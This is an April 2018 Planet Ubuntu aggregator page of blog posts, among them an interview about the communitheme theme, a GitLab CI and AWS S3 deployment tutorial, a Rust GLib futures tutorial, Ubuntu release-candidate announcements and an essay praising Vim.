25 Apr 2018

feedPlanet Ubuntu

Stephen Michael Kellat: Saying Something in April 2018

A goal is to try to say something once per month that posts to Planet Ubuntu. That can be a hard thing to do. We've been through an extremely rough time at work. During this season we have had a number of unprecedented things happen including an interruption in appropriations (legal authority to spend money), retroactive changes to the tax laws in the middle of the filing season, and the mainframe itself flaming out in a gigantic crash (metaphorically speaking) on the last day of the filing season. Our contingency plans are well-exercised.

Being able to bang on (that is to say, percussively test) Bionic Beaver has been a blast. I haven't done ISO testing this round. Instead, I've been using my Xubuntu desktop daily watching things break and have been watching apport file bugs. Doing so makes me realize that, frankly, I am not normal in terms of installed packages or workflow. I have quite a bit of LaTeX installed due to church work. I have many ham radio-related things installed. Audio production and video production packages are installed too. Yes, sometimes I break down and even use LibreOffice. I don't have the whole package archive installed but I have a visible chunk of it in place as I use many things in many ways.

I fired up a droplet on Digital Ocean. My production website lives again in a very stripped-down form at http://erielookingproductions.info. The original is kept in LaTeX and the website is produced using LaTeXML which is available in the package archive. That site exhibits probably one of the lesser-trod paths in terms of creating a static web page.

Are we going to have a Carnivorous Camel? Is it a Cautious Cat? What is the new codename?

25 Apr 2018 2:00am GMT

24 Apr 2018

feedPlanet Ubuntu

Didier Roche: Welcome To The (Ubuntu) Bionic Age: Behind communitheme: interviewing Merlijn

Interviewing people behind communitheme. Today: Merlijn

As discussed last week when unveiling the communitheme snap for ubuntu 18.04 LTS, here is a suite of interview this week on some members of the core contributor team shaping this entirely community-driven theme.

Today is the turn of Merlijn, merlijn-sebrechts on the community hub.

Who are you? What are you doing/where are you working? Give us some words and background about you!

I'm Merlijn Sebrechts, I'm a PhD student and teaching assistant at Ghent University in Belgium.

When I went to do an internship in rural Tanzania, I brought an old Dell laptop with Ubuntu 12.10 on it. After being forced to use it for everything for three months, I was actually sad to let it go and go back to my Windows 8.1 laptop, so I removed Windows, put Ubuntu on it and I've been using it exclusively ever since! (and I love it!)

I'm doing research on system administration, specifically on how we can use cloud modeling languages (like Juju!) to make system administration easier. Linux can do so much cool stuff, if it's just configured correctly, so it's a shame that it's so hard to do that.

What are you mainly contributor areas on communitheme?

I set up some of the building and packaging infrastructure, wrote some documentation about how to test and contribute to the theme and I helped review pull requests, sift through bugs, and joined the discussions in various places.

How did you hear about new theming effort on ubuntu, what made you willing to participate actively to it?

I think the new theme effort started with me ranting about Ambiance on one of your (didrocks') blog posts [Note from Didier: I confirm! ;)]. You responded saying that I was free to do something about it, so I suggested getting a bunch of the community together to create a new theme?

I've wanted to contribute back to Ubuntu for a long time and Ambiance really annoyed me, so I was happy to help fix that. I did some drive by patches to other projects in the past (I tried to fix the "buy steam for €0" bug, but I didn't get the PR accepted.). This is the first significant project I'm working on, so I'm proud that I can be of use, even though I didn't really do much…

I'd encourage anyone to just get their hands dirty and go contribute to Ubuntu. The people are nice, you'll learn a lot and you'll find hidden launchpad corners you never knew existed!

How is the interaction with the larger community, how do you deal with different ideas and opinions on the community hub, issues opened against the projects, PR?

It's impossible for me to keep up with the community… It's important to keep reminding people that there's a human at the other side of their keyboard. However, it's also a lot of fun to see so many passionate people! My mind immediately wanders off and think of how we can use this enthusiasm better. You see so many people who are very interested and eager to help so I tried to make the documentation as clear as possible and explain in detail how to contribute to lower the barrier to start contributing code, but that only goes so far…

This isn't really answering the question, but I think that the time you (didrocks) spent bootstrapping this whole project is very well-spent time. There are a lot of passionate people out there who can become contributors if they just get a gentle push in the back and if you let them know that you don't have to be paid by Canonical to work on this awesome project. You should do more of this: scout the comments section for people willing to get their hands dirty and give them a cool project to get started with.

What did you think (honestly) about the decision for not shipping it by default on 18.04, but curating it for a little while? Do you think the snap approach for 18.04 will give us more flexibility before shipping a finale version?

It wasn't an easy decision to make, I'd much rather have 18.04 ship with a new theme, but I agree that the theme wasn't ready, especially not for a UI freeze. I'm color blind myself, so I know that it's easy for a theme to make a system unusable. Most people use Ubuntu to build stuff, they choose Ubuntu because it helps them get their work done, and/or because they believe in "the cause". Few people choose Ubuntu because of its beauty, so functionality is very important.

My main concern is that people should be able to install the theme without using the commandline. I have a bunch of non-techy friends using Ubuntu and each time they have to use the CLI to do basic stuff, I feel ashamed… However, the snap solves that! You open Ubuntu software, install the theme, reboot and BAM! you've got yourself a new theme, new system sounds, a new cursor and much UI tweaks!

Any idea or wish on what the theme name (communitheme is a codename project) should be?

The theme is shaped by the Suru design language, with its Japanese influences, and the current Ambiance theme. I have zero knowledge of Japanese, and it seems like an incredibly complex language, so It might be totally off, but translating Ambiance to Japanese gave me Fun'iki. However, I don't want to find out in what strange and interesting ways Ubuntu will break by having an apostrophe in a them name, and I don't like how the word looks and sounds. It doesn't have that earthy Ubuntu feel.

Suru itself is the verb "to do", which got me to Yaru (to do / to give) which is more informal and can be used in the context of joy and pride like proudly exclaiming "yatta!" or "I did it!". But we have to give credit where credit is due: we couldn't have done it without Ambiance, both the theme itself as the inspiration and the atmosphere as the motivation. We're doing it because it's fun, so whatever way you look at it; Ambiance gave us Yaruki: "the motivation to do".

Although I also like the sound of "Yaru" itself so ¯_(ツ)_/¯.

Any last words or questions I should have asked you?

"Are you having fun?"

A: "Yes!"

Thanks Merlijn!

And the last interview will come up tomorrow. Do not miss it! :)

24 Apr 2018 9:20am GMT

23 Apr 2018

feedPlanet Ubuntu

The Fridge: Ubuntu Weekly Newsletter Issue 524

Welcome to the Ubuntu Weekly Newsletter, Issue 524 for the week of April 15 - 21, 2018 - the full version is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

23 Apr 2018 10:32pm GMT

Benjamin Mako Hill: Is English Wikipedia’s ‘rise and decline’ typical?

This graph shows the number of people contributing to Wikipedia over time:

The Rise and Decline of Wikipedia The number of active Wikipedia contributors exploded, suddenly stalled, and then began gradually declining. (Figure taken from Halfaker et al. 2013)

The figure comes from "The Rise and Decline of an Open Collaboration System," a well-known 2013 paper that argued that Wikipedia's transition from rapid growth to slow decline in 2007 was driven by an increase in quality control systems. Although many people have treated the paper's finding as representative of broader patterns in online communities, Wikipedia is a very unusual community in many respects. Do other online communities follow Wikipedia's pattern of rise and decline? Does increased use of quality control systems coincide with community decline elsewhere?

In a paper that my student Nathan TeBlunthuis is presenting Thursday morning at the Association for Computing Machinery (ACM) Conference on Human Factors in Computing Systems (CHI), a group of us have replicated and extended the 2013 paper's analysis in 769 other large wikis. We find that the dynamics observed in Wikipedia are a strikingly good description of the average Wikia wiki. They appear to reoccur again and again in many communities.

The original "Rise and Decline" paper (we'll abbreviate it "RAD") was written by Aaron Halfaker, R. Stuart Geiger, Jonathan T. Morgan, and John Riedl. They analyzed data from English Wikipedia and found that Wikipedia's transition from rise to decline was accompanied by increasing rates of newcomer rejection as well as the growth of bots and algorithmic quality control tools. They also showed that newcomers whose contributions were rejected were less likely to continue editing and that community policies and norms became more difficult to change over time, especially for newer editors.

Our paper, just published in the CHI 2018 proceedings, replicates most of RAD's analysis on a dataset of 769 of the largest wikis from Wikia that were active between 2002 to 2010. We find that RAD's findings generalize to this large and diverse sample of communities.

We can walk you through some of the key findings. First, the growth trajectory of the average wiki in our sample is similar to that of English Wikipedia. As shown in the figure below, an initial period of growth stabilizes and leads to decline several years later.

Rise and Decline on Wikia The average Wikia wikia also experience a period of growth followed by stabilization and decline (from TeBlunthuis, Shaw, and Hill 2018).

We also found that newcomers on Wikia wikis were reverted more and continued editing less. As on Wikipedia, the two processes were related. Similar to RAD, we also found that newer editors were more likely to have their contributions to the "project namespace" (where policy pages are located) undone as wikis got older. Indeed, the specific estimates from our statistical models are very similar to RAD's for most of these findings!

There were some parts of the RAD analysis that we couldn't reproduce in our context. For example, there are not enough bots or algorithmic editing tools in Wikia to support statistical claims about their effects on newcomers.

At the same time, we were able to do some things that the RAD authors could not. Most importantly, our findings discount some Wikipedia-specific explanations for a rise and decline. For example, English Wikipedia's decline coincided with the rise of Facebook, smartphones, and other social media platforms. In theory, any of these factors could have caused the decline. Because the wikis in our sample experienced rises and declines at similar points in their life-cycle but at different points in time, the rise and decline findings we report seem unlikely to be caused by underlying temporal trends.

The big communities we study seem to have consistent "life cycles" where stabilization and/or decay follows an initial period of growth. The fact that the same kinds of patterns happen on English Wikipedia and other online groups implies a more general set of social dynamics at work that we do not think existing research (including ours) explains in a satisfying way. What drives the rise and decline of communities more generally? Our findings make it clear that this is a big, important question that deserves more attention.

We hope you'll read the paper and get in touch by commenting on this post or emailing Nate if you'd like to learn or talk more. The paper is available online and has been published under an open access license. If you really want to get into the weeds of the analysis, we will soon publish all the data and code necessary to reproduce our work in a repository on the Harvard Dataverse.

Nate TeBlunthuis will be presenting the project this week at CHI in Montréal on Thursday April 26 at 9am in room 517D. For those of you not familiar with CHI, it is the top venue for Human-Computer Interaction. All CHI submissions go through double-blind peer review and the papers that make it into the proceedings are considered published (same as journal articles in most other scientific fields). Please feel free to cite our paper and send it around to your friends!


This blog post, and the open access paper that it describes, is a collaborative project with Aaron Shaw, that was led by Nate TeBlunthuis. A version of this blog post was originally posted on the Community Data Science Collective blog. Financial support came from the US National Science Foundation (grants IIS-1617129, IIS-1617468, and GRFP-2016220885 ), Northwestern University, the Center for Advanced Study in the Behavioral Sciences at Stanford University, and the University of Washington. This project was completed using the Hyak high performance computing cluster at the University of Washington.

23 Apr 2018 9:20pm GMT

Lubuntu Blog: This Week in Lubuntu Development #4

Here is the fourth issue of This Week in Lubuntu Development. You can read last week's issue here. Changes General Some work was done on the Lubuntu Manual by Lubuntu contributor Lyn Perrine. You can see the commits she has made here. We need your help with the Lubuntu Manual! Take a look at PROGRESS.md […]

23 Apr 2018 4:00pm GMT

Riccardo Padovani: AWS S3 + GitLab CI = automatic deploy for every branch of your static website

You have a static website and you want to share to your team the last changes you have done, before going online! How to do so?

If you use GitLab and you have an account AWS, it's time to step up your game and automatize everything. We are going to setup a system which will deploy every branch you create to S3, and clean up after yourself when the branch is merged or deleted.

AWS S3 is just a storage container, so of course you can't host in this way a dynamic website, but for a static one (as this blog), it is perfect.

Also, please note that AWS S3 buckets for hosting a website are public, and while you need to know the URL to access it, there are way to list them. So do not set up this system if you have private data on your website.

Of course, standard S3 prices will apply.

We will use GitLab CI, since it is shipped with GitLab and deeply integrated with it.

Gitlab CI is a very powerful system of Continuous Integration, with a lot of different features, and with every new releases, new features land. It has a rich technical documentation that I suggest you reading.

If you want to know why Continuous Integration is important I suggest reading this article, while for finding the reasons for using Gitlab CI specifically, I leave the job to Gitlab.com itself. I've also written another article with a small introduction to Gitlab CI.

I suppose you already have an AWS account and you know a bit how GitLab CI works. If not, please create an account and read some of the links above to learn about GitLab CI.

Setting up AWS

First thing is setting up AWS S3 and a dedicated IAM user to push to S3.

Since every developer with permissions to push to the repository will have access to the tokens of the IAM use, it is better to limit its permissions as much as possible.

Setting up S3

To set up S3, go to S3 control panel, create a new bucket, choose a name (from now on, I will use example-bucket) and a region, and finish the creation leaving the default settings.

After that, you need to enable the website management: go to Bucket -> Properties and enable Static website hosting, selecting Use this bucket to host a website as in the image. As index, put index.html - you can then upload a landing page there, if you want.

Take note of the bucket's URL, we will need it.

s3 bucket creation

We now grant permissions to read objects to everybody; we will use the policy described in the AWS guide. For other information on how to host a static website, please follow the official documentation.

To grant the read permissions, go to Permissions->Bucket policy and insert:

{
  "Version":"2012-10-17",
  "Statement":[{
    "Sid":"PublicReadGetObject",
    "Effect":"Allow",
          "Principal": "*",
    "Action":["s3:GetObject"],
    "Resource":["arn:aws:s3:::example-bucket/*"]
  }]
}

Of course, you need to insert your bucket's name in the Resource line.

Creating the IAM user

Now we need to create the IAM user that will upload content to the S3 bucket, with a policy that allows only upload to our GitLab bucket.

Go to IAM and create a new policy, with the name you prefer:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:PutObject",
                "s3:DeleteObject"
            ],
            "Resource": "arn:aws:s3:::example-bucket/*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": "s3:ListObjects",
            "Resource": "*"
        }
    ]
}

Of course, again, you should change the Resource field to the name of your bucket. If you know the GitLab runners' IPs, you can restrict the policy to that IPs.

Now you can create a new user granting it Programmatic access. I will call it gitlabs3uploader. Assign it the policy we just created.

iam user creation

For more information on how to manage multiple AWS accounts for security reasons, I leave you to the official guide.

Setting up GitLab CI

We need to inject the credentials in the GitLab runner. Go to your project, Settings -> CI / CD -> Secret variables and set two variables:

Since we want to publish every branch, we do not set them as protected, because they need to be available in every branch.

secret variables config

.gitlab-ci.yml

We now need to explain GitLab how to publish the website. If you need to build it before, you can do so. rpadovani.com uses Jekyll, so my .gitlab-ci.yml file is like this:

image: "registry.gitlab.com/rpadovani/rpadovani.com:latest" # Custom Ruby image, replace with whatever you want
stages:
  - build
  - deploy

variables:
  AWS_DEFAULT_REGION: eu-central-1 # The region of our S3 bucket
  BUCKET_NAME: bucket-name         # Your bucket name

cache:
  paths:
    - vendor

buildJekyll:  # A job to build the static website - replace it with your build methods
  stage: build
  script:
    - bundle install --path=vendor/
    - bundle exec jekyll build --future # The server is in another timezone..
  artifacts:
    paths:
      - _site/  # This is what we want to publish, replace with your `dist` directory

deploys3:
  image: "python:latest"  # We use python because there is a well-working AWS Sdk
  stage: deploy
  dependencies:
    - buildJekyll      # We want to specify dependencies in an explicit way, to avoid confusion if there are different build jobs
  before_script:
    - pip install awscli # Install the SDK
  script:
    - aws s3 cp _site s3://${BUCKET_NAME}/${CI_COMMIT_REF_SLUG} --recursive # Replace example-bucket with your bucket
  environment:
    name: ${CI_COMMIT_REF_SLUG}
    url: http://${BUCKET_NAME}.s3-website.eu-central-1.amazonaws.com/${CI_COMMIT_REF_SLUG}  # This is the url of the bucket we saved before
    on_stop: clean_s3 # When the branch is merged, we clean up after ourself

clean_s3:
  image: "python:latest"
  stage: deploy
  before_script:
    - pip install awscli
  script:
    - aws s3 rm s3://${BUCKET_NAME}/${CI_COMMIT_REF_SLUG} --recursive # Replace example-bucket with your bucket
  environment:
    name: ${CI_COMMIT_REF_SLUG}
    action: stop
  when: manual

For more information about dynamic environments, see the documentation.

To verify your .gitlab-ci.yml is correct, go to your project on GitLab, then CI / CD -> Pipelines, and in the top right of the page there is a CI Lint link. It does not only lint your code, but it also creates a nice overview of all your jobs.

ci lint

Thanks to the environments, we will have the link to the test deployment directly in the merge request, so your QA team, and every other stakeholder interested in seeing the website before going to production, can do it directly from GitLab.

Merge request overview

Also, after you merge your branch, GitLab will clean after itself, so you do not have useless websites in S3.

You can also see all the deployments in CI / CD -> Environments, and trigger new deploys.

Conclusion

They say 2018 is the year for DevOps. I am not sure about that, but I am sure that a well configured Continuous Integration and Continuous Delivery system save you and your company a lot of time and headaches.

If your builds are perfectly reproducibly, and everything is automatic, you can focus on what really matters: developing solutions for your customers.

This was a small example on how to integrate AWS and GitLab, but you know the only limit is your fantasy. Also, a lot of new features are introduced every month in Gitlab and GitLab CI, so keep an eye on the Gitlab blog.

Kudos to the Gitlab team (and others guys who help in their free time) for their awesome work!

If you have any question or feedback about this blog post, please drop me an email at riccardo@rpadovani.com or tweet me :-) Feel free to suggest me to add something, or to rephrase paragraphs in a clearer way (English is not my mother tongue).

Bye for now,
R.

P.S: if you have found this article helpful and you'd like I write others, do you mind to help me reaching the Ballmer's peak and buyme a beer?

23 Apr 2018 2:30pm GMT

Sebastian Dröge: GLib/GIO async operations and Rust futures + async/await

Unfortunately I was not able to attend the Rust+GNOME hackfest in Madrid last week, but I could at least spend some of my work time at Centricular on implementing one of the things I wanted to work on during the hackfest. The other one, more closely related to the gnome-class work, will be the topic of a future blog post once I actually have something to show.

So back to the topic. With the latest GIT version of the Rust bindings for GLib, GTK, etc it is now possible to make use of the Rust futures infrastructure for GIO async operations and various other functions. This should make writing of GNOME, and in general GLib-using, applications in Rust quite a bit more convenient.

For the impatient, the summary is that you can use Rust futures with GLib and GIO now, that it works both on the stable and nightly version of the compiler, and with the nightly version of the compiler it is also possible to use async/await. An example with the latter can be found here, and an example just using futures without async/await here.

Table of Contents

  1. Futures
    1. Futures in Rust
    2. Async/Await
    3. Tokio
  2. Futures & GLib/GIO
    1. Callbacks
    2. GLib Futures
    3. GIO Asynchronous Operations
    4. Async/Await
  3. The Future

Futures

First of all, what are futures and how do they work in Rust. In a few words, a future (also called promise elsewhere) is a value that represents the result of an asynchronous operation, e.g. establishing a TCP connection. The operation itself (usually) runs in the background, and only once the operation is finished (or fails), the future resolves to the result of that operation. There are all kinds of ways to combine futures, e.g. to execute some other (potentially async) code with the result once the first operation has finished.

It's a concept that is also widely used in various other programming languages (e.g. C#, JavaScript, Python, …) for asynchronous programming and can probably be considered a proven concept at this point.

Futures in Rust

In Rust, a future is basically an implementation of relatively simple trait called Future. The following is the definition as of now, but there are discussions to change/simplify/generalize it currently and to also move it to the Rust standard library:

pub trait Future {
    type Item;
    type Error;

    fn poll(&mut self, cx: &mut task::Context) -> Poll<Self::Item, Self::Error>;
}

Anything that implements this trait can be considered an asynchronous operation that resolves to either an Item or an Error. Consumers of the future would call the poll method to check if the future has resolved already (to a result or error), or if the future is not ready yet. In case of the latter, the future itself would at a later point, once it is ready to proceed, notify the consumer about that. It would get a way for notifications from the Context that is passed, and proceeding does not necessarily mean that the future will resolve after this but it could just advance its internal state closer to the final resolution.

Calling poll manually is kind of inconvenient, so generally this is handled by an Executor on which the futures are scheduled and which is running them until their resolution. Equally, it's inconvenient to have to implement that trait directly so for most common operations there are combinators that can be used on futures to build new futures, usually via closures in one way or another. For example the following would run the passed closure with the successful result of the future, and then have it return another future (Ok(()) is converted via IntoFuture to the future that always resolves successfully with ()), and also maps any errors to ()

fn our_future() -> impl Future<Item = (), Err = ()> {
    some_future
        .and_then(|res| {
            do_something(res);
            Ok(())
        })
        .map_err(|_| ())
}

A future represents only a single value, but there is also a trait for something producing multiple values: a Stream. For more details, best to check the documentation.

Async/Await

The above way of combining futures via combinators and closures is still not too great, and is still close to callback hell. In other languages (e.g. C#, JavaScript, Python, …) this was solved by introducing new features to the language: async for declaring futures with normal code flow, and await for suspending execution transparently and resuming at that point in the code with the result of a future.

Of course this was also implemented in Rust. Currently based on procedural macros, but there are discussions to actually move this also directly into the language and standard library.

The above example would look something like the following with the current version of the macros

#[async]
fn our_future() -> Result<(), ()> {
    let res = await!(some_future)
        .map_err(|_| ())?;

    do_something(res);
    Ok(())
}

This looks almost like normal, synchronous code but is internally converted into a future and completely asynchronous.

Unfortunately this is currently only available on the nightly version of Rust until various bits and pieces get stabilized.

Tokio

Most of the time when people talk about futures in Rust, they implicitly also mean Tokio. Tokio is a pure Rust, cross-platform asynchronous IO library and based on the futures abstraction above. It provides a futures executor and various types for asynchronous IO, e.g. sockets and socket streams.

But while Tokio is a great library, we're not going to use it here and instead implement a futures executor around GLib. And on top of that implement various futures, also around GLib's sister library GIO, which is providing lots of API for synchronous and asynchronous IO.

Just like all IO operations in Tokio, all GLib/GIO asynchronous operations are dependent on running with their respective event loop (i.e. the futures executor) and while it's possible to use both in the same process, each operation has to be scheduled on the correct one.

Futures & GLib/GIO

Asynchronous operations and generally everything event related (timeouts, …) are based on callbacks that you have to register, and are running via a GMainLoop that is executing events from a GMainContext. The latter is just something that stores everything that is scheduled and provides API for polling if something is ready to be executed now, while the former does exactly that: executing.

Callbacks

The callback based API is also available via the Rust bindings, and would for example look as follows

glib::timeout_add(20, || {
    do_something_after_20ms();
    glib::Continue(false) // don't call again
});

glib::idle_add(|| {
    do_something_from_the_main_loop();
    glib::Continue(false) // don't call again
});

some_async_operation(|res| {
    match res {
        Err(err) => report_error_somehow(),
        Ok(res) => {
            do_something_with_result(res);
            some_other_async_operation(|res| {
                do_something_with_other_result(res);
            });
        }
    }
});

As can be seen here already, the callback-based approach leads to quite non-linear code and deep indentation due to all the closures. Also error handling becomes quite tricky due to somehow having handle them from a completely different call stack.

Compared to C this is still far more convenient due to actually having closures that can capture their environment, but we can definitely do better in Rust.

The above code also assumes that somewhere a main loop is running on the default main context, which could be achieved with the following e.g. inside main()

let ctx = glib::MainContext::default();
let l = glib::MainLoop::new(Some(&ctx), false);
ctx.push_thread_default();

// All operations here would be scheduled on this main context
do_things(&l);

// Run everything until someone calls l.quit()
l.run();
ctx.pop_thread_default();

It is also possible to explicitly select for various operations on which main context they should run, but that's just a minor detail.

GLib Futures

To make this situation a bit nicer, I've implemented support for futures in the Rust bindings. This means, that the GLib MainContext is now a futures executor (and arbitrary futures can be scheduled on it), all the GSource related operations in GLib (timeouts, UNIX signals, …) have futures- or stream-based variants and all the GIO asynchronous operations also come with futures variants now. The latter are autogenerated with the gir bindings code generator.

For enabling usage of this, the futures feature of the glib and gio crates have to be enabled, but that's about it. It is currently still hidden behind a feature gate because the futures infrastructure is still going to go through some API incompatible changes in the near future.

So let's take a look at how to use it. First of all, setting up the main context and executing a trivial future on it

let c = glib::MainContext::default();
let l = glib::MainLoop::new(Some(&c), false);

c.push_thread_default();

// Spawn a future that is called from the main context
// and after printing something just quits the main loop
let l_clone = l.clone();
c.spawn(futures::lazy(move |_| {
    println!("we're called from the main context");
    l_clone.quit();
    Ok(())
});

l.run();

c.pop_thread_default();

Apart from spawn(), there is also a spawn_local(). The former can be called from any thread but requires the future to implement the Send trait (that is, it must be safe to send it to other threads) while the latter can only be called from the thread that owns the main context but it allows any kind of future to be spawned. In addition there is also a block_on() function on the main context, which allows to run non-static futures up to their completion and returns their result. The spawn functions only work with static futures (i.e. they have no references to any stack frame) and requires the futures to be infallible and resolve to ().

The above code already showed one of the advantages of using futures: it is possible to use all generic futures (that don't require a specific executor), like futures::lazy or the mpsc/oneshot channels with GLib now. And any of the combinators that are available on futures

let c = MainContext::new();
                                                                                                       
let res = c.block_on(timeout_future(20)
    .and_then(move |_| {
        // Called after 20ms
        Ok(1)
    })
);

assert_eq!(res, Ok(1));

This example also shows the block_on functionality to return an actual value from the future (1 in this case).

GIO Asynchronous Operations

Similarly, all asynchronous GIO operations are now available as futures. For example to open a file asynchronously and getting a gio::InputStream to read from, the following could be done

let file = gio::File::new_for_path("Cargo.toml");

let l_clone = l.clone();
c.spawn_local(
    // Try to open the file
    file.read_async_future(glib::PRIORITY_DEFAULT)
        .map_err(|(_file, err)| {
            format!("Failed to open file: {}", err)
        })
        .and_then(move |(_file, strm)| {
            // Here we could now read from the stream, but
            // instead we just quit the main loop
            l_clone.quit();

            Ok(())
        })
);

A bigger example can be found in the gtk-rs examples repository here. This example is basically reading a file asynchronously in 64 byte chunks and printing it to stdout, then closing the file.

In the same way, network operations or any other asynchronous operation can be handled via futures now.

Async/Await

Compared to a callback-based approach, that bigger example is already a lot nicer but still quite heavy to read. With the async/await extension that I mentioned above already, the code looks much nicer in comparison and really almost like synchronous code. Except that it is not synchronous.

#[async]
fn read_file(file: gio::File) -> Result<(), String> {
    // Try to open the file
    let (_file, strm) = await!(file.read_async_future(glib::PRIORITY_DEFAULT))
        .map_err(|(_file, err)| format!("Failed to open file: {}", err))?;

    Ok(())
}

fn main() {
    [...]
    let future = async_block! {
        match await!(read_file(file)) {
            Ok(()) => (),
            Err(err) => eprintln!("Got error: {}", err),
        }
        l_clone.quit();
        Ok(())
    };

    c.spawn_local(future);
    [...]
}

For compiling this code, the futures-nightly feature has to be enabled for the glib crate, and a nightly compiler must be used.

The bigger example from before with async/await can be found here.

With this we're already very close in Rust to having the same convenience as in other languages with asynchronous programming. And also it is very similar to what is possible in Vala with GIO asynchronous operations.

The Future

For now this is all finished and available from GIT of the glib and gio crates. This will have to be updated in the future whenever the futures API is changing, but it is planned to stabilize all this in Rust until the end of this year.

In the future it might also make sense to add futures variants for all the GObject signal handlers, so that e.g. handling a click on a GTK+ button could be done similarly from a future (or rather from a Stream as a signal can be emitted multiple times). If this is in the end more convenient than the callback-based approach that is currently used, is to be seen. Some experimentation would be necessary here. Also how to handle return values of signal handlers would have to be figured out.

23 Apr 2018 8:46am GMT

Jorge Castro: How to video conference without people hating you

While video conferencing has been a real boost to productivity there are still lots of things that can go wrong during a conference video call.

There are some things that are just plain out of your control, but there are some things that you can control. So, after doing these for the past 15 years or so, here are some tips if you're just getting into remote work and want to do a better job. Of course I have been guilty of all of these. :D

Stuff to have

What about an integrated headset and microphone? This totally depends on the type. I tend to prefer the full sound of a real microphone but the boom mics on some of these headsets are quite good. If you have awesome heaphones already you can add a modmic to turn them into headsets. I find that even the most budget dedicated headsets sound better than earbud microphones.

Stuff to get rid of

Garbage habits we all hate

If you're just dialing in to listen then most of these won't apply to you, however …

Treat video conferencing like you do everything else at work

We invest in our computers and our developer tools, so it's important to think seriously about putting your video conferencing footprint in that namespace. There is a good chance no one will notice that you always sound good, but it's one of those background quality things that just makes everyone more productive. Besides, think of the money you've spent on your laptop and everything else to make you better at work, better audio gear is a good investment.

In the real world, sometimes you just have to travel and you find yourself stuck on a laptop on hotel wireless in a corner trying to your job, but I strive to make that situation the exception!

23 Apr 2018 12:00am GMT

22 Apr 2018

feedPlanet Ubuntu

Sean Davis: MenuLibre 2.2.0 Released

After 2.5 years of on-again/off-again development, a new stable release of MenuLibre is now available! This release includes a vast array of changes since 2.0.7 and is recommended for all users.

What's New?

Since MenuLibre 2.0.7, the previous stable release.

General

New Features

Interface Updates

Downloads

Source tarball (md5, sig)

Available on Debian Testing/Unstable and Ubuntu 18.04 "Bionic Beaver". Included in Xubuntu 18.04.

22 Apr 2018 11:08am GMT

Sean Davis: Mugshot 0.4.0 Released

Mugshot, the simple user configuration utility, has hit a new stable milestone! Release 0.4.0 wraps up the 0.3 development cycle with full camera support for the past several years of GTK+ releases (and a number of other fixes).

What's New?

Since Mugshot 0.2.5, the previous stable release.

Downloads

Source tarball (md5, sig)

Available in Debian Unstable and Ubuntu 18.04 "Bionic Beaver". Included in Xubuntu 18.04.

22 Apr 2018 10:17am GMT

Ubuntu Studio: Ubuntu Studio 18.04 Release Candidate

The Release Candidate for Ubuntu Studio 18.04 is ready for testing. Download it here There are some known issues: Volume label still set to Beta base-files still not the final version kernel will have (at least) one more revision Please report any bugs using ubuntu-bug {package name}. Final release is scheduled to be released on […]

22 Apr 2018 2:34am GMT

Kubuntu General News: Bionic (18.04) Release Candidate images ready for testing!

Initial RC (Release Candidate) images for the Kubuntu Bionic Beaver (18.04) are now available for testing.

The Kubuntu team will be releasing 18.04 on 26 April. The final Release Candidate milestone is available today, 21 April.

This is the first spin of a release candiate in preparation for the RC milestone. If major bugs are encountered and fixed, the RC images may be respun.

Kubuntu Beta pre-releases are NOT recommended for:

Kubuntu Beta pre-releases are recommended for:

Getting Kubuntu 18.04 RC testing images:

To upgrade to Kubuntu 18.04 pre-releases from 17.10, run sudo do-release-upgrade -d from a command line.

Download a Bootable image and put it onto a DVD or USB Drive via the download link at

http://iso.qa.ubuntu.com/qatracker/milestones/389/builds

This is also the direct link to report your findings and any bug reports you file.

See our release notes: https://wiki.ubuntu.com/BionicBeaver/ReleaseNotes/Kubuntu

Please report your results on the Release tracker.

22 Apr 2018 1:13am GMT

Gustavo Silva: Why Everyone should know vim

Vim is an improved version of Vi, a known text editor available by default in UNIX distributions. Another alternative for modal editors is Emacs but they're so different that I kind of feel they serve different purposes. Both are great, regardless.

I don't feel vim is necessarily a geeky kind of taste or not. Vim introduced modal editing to me and that has changed my life, really. If you have ever tried vim, you may have noticed you have to press "I" or "A" (lower case) to start writing (note: I'm aware there are more ways to start editing but the purpose is not to cover Vim's functionalities.). The fun part starts once you realize you can associate Insert and Append commands to something. And then editing text is like thinking of what you want the computer to show on the computer instead of struggling where you at before writing. The same goes for other commands which are easily converted to mnemonics and this is what helped getting comfortable with Vim. Note that Emacs does not have this kind of keybindings but they do have a Vim-like mode - Evil (Extensive Vi Layer). More often than not, I just need to think of what I want to accomplish and type the first letters. Like Replace, Visual, Delete, and so on. It is a modal editor after all, meaning it has modes for everything. This is also what increases my productivity when writing files. I just think of my intentions and Vim does the things for me.

Here's another cool example. Imagine this Python line (do not fear, this is not a coding post):

def function(aParameterThatChanged)

In a non-modal editing text editor, you would need to pick your mouse, select the text carefully inside the parenthesis (you might be able to double click the text and it would highlight it) and then delete, write all over, etc. In Vim, there are basically two options to do that. You can type di( and that would d\elete i\nside the symbol you typed. How helpful is that? Want to blow your mind? Typing ci( would actually change i\nside the symbol by deleting and changing to insert mode automatically.

Vim has a significant learning curve, I'm aware of that. Many people get discouraged on the first try but sticking to Vim has changed how I perceive text writing and I know, for sure, it has been a positive change. I write faster, editing is an instant, I don't need the mouse for anything at all, vim starts instantly and many other cool features. For those looking for customization, Vim is fully customizable without causing too much of a load in your CPU, like it happens in Atom. Vim is also easily accessible anywhere. Take IntelliJ for example, a Java IDE multi-platform. It even recommends installing the Vim plugin right-after the installation process. Obviously, I did it. In an UNIX terminal, Vim comes by default.

I just wanted to praise modal editing, more than Vim itself, although the tool is amazing. I believe everyone should know Vim. It is simpler than Emacs, has lots of potential and it can make you more productive. But modal editing got me addicted to this. I can't install an IDE without looking for vim extensions.

I would like everyone to try Vi's modal editing. It will change your life, I assure you, despite requiring a bit of time in the beginning. If you ever get stuck, just Google your problem and I'm 150% positive you will find an answer. As time goes by, I'm positive you will find out features of vim you didn't even know it was possible.

Thanks for reading.

gsilvapt

22 Apr 2018 12:00am GMT

21 Apr 2018

feedPlanet Ubuntu

Benjamin Mako Hill: Mako Hate

I recently discovered a prolific and sustained community of meme-makers on Tumblr dedicated to expressing their strong dislike for "Mako."

Two tags with examples are #mako hate and #anti mako but there are many others.

I've also discovered Tumblrs entirely dedicated to the topic!

